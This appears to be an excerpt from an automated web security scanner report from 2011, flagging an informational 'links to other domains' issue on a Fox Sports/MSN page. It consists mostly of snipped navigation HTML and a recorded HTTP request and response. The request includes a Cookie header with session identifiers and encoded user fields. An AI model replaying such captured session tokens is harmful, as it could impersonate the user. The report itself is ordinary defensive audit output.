                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportssouthwest.com/01/05/11/Tannehill-hopes-to-continue-winning-ways/landing_big12.html?blockID=385631&amp;feedID=3673' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Keep the change');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Keep the change') });location.href=this.href;">
<div id="blurb_1" align="left" class="blurb">
...[SNIP]...
<div class="fs-tune-in">

   
           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MMA_Boxing?vid=48114488-a888-4448-b344-8fb1ecea3a4b&amp;from=foxsports/mma_boxing/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=48114488-a888-4448-b344-8fb1ecea3a4b&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MMA_Boxing?vid=774730db-321d-4814-9560-e9895e6362fb&amp;from=foxsports/mma_boxing/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=774730db-321d-4814-9560-e9895e6362fb&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MMA_Boxing?vid=e1306351-49cd-46ea-a3d7-79b2a69cfe00&amp;from=foxsports/mma_boxing/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=e1306351-49cd-46ea-a3d7-79b2a69cfe00&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MMA_Boxing?vid=84bd31d5-014e-4785-8605-6181ca29653c&amp;from=foxsports/mma_boxing/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=84bd31d5-014e-4785-8605-6181ca29653c&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MMA_Boxing?vid=56d32140-ebac-4239-b840-b66eec346410&amp;from=foxsports/mma_boxing/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=56d32140-ebac-4239-b840-b66eec346410&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...


   
<a href="http://network.yardbarker.com/mma/article_external/shields_confirms_fight_with_georges_st_pierre/3922215" title="Shields confirms fight with St. Pierre at UFC 129">Shields confirms fight with St. Pierre at UFC 129</a>
...[SNIP]...


   
        <a href="http://network.yardbarker.com/mma/article_external/shields_confirms_fight_with_georges_st_pierre/3922215" title="Shields confirms fight with St. Pierre at UFC 129"></a>
...[SNIP]...


   
<a href="http://network.yardbarker.com/mma/article_external/brandon_vera_marcus_davis_released_from_ufc_following_ufc_125_losses/3925656" title="Brandon Vera, Marcus Davis released from UFC">Brandon Vera, Marcus Davis released from UFC</a>
...[SNIP]...


   
        <a href="http://network.yardbarker.com/mma/article_external/brandon_vera_marcus_davis_released_from_ufc_following_ufc_125_losses/3925656" title="Brandon Vera, Marcus Davis released from UFC"></a>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.7. http://msn.foxsports.com/collegefootball/gameTrax  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /collegefootball/gameTrax

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /collegefootball/gameTrax?gameId=201101070084 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 251329
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=6
Date: Sat, 08 Jan 2011 00:48:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<!-- CSS/JS Collection -->


<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d775349/7/775549/randm.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


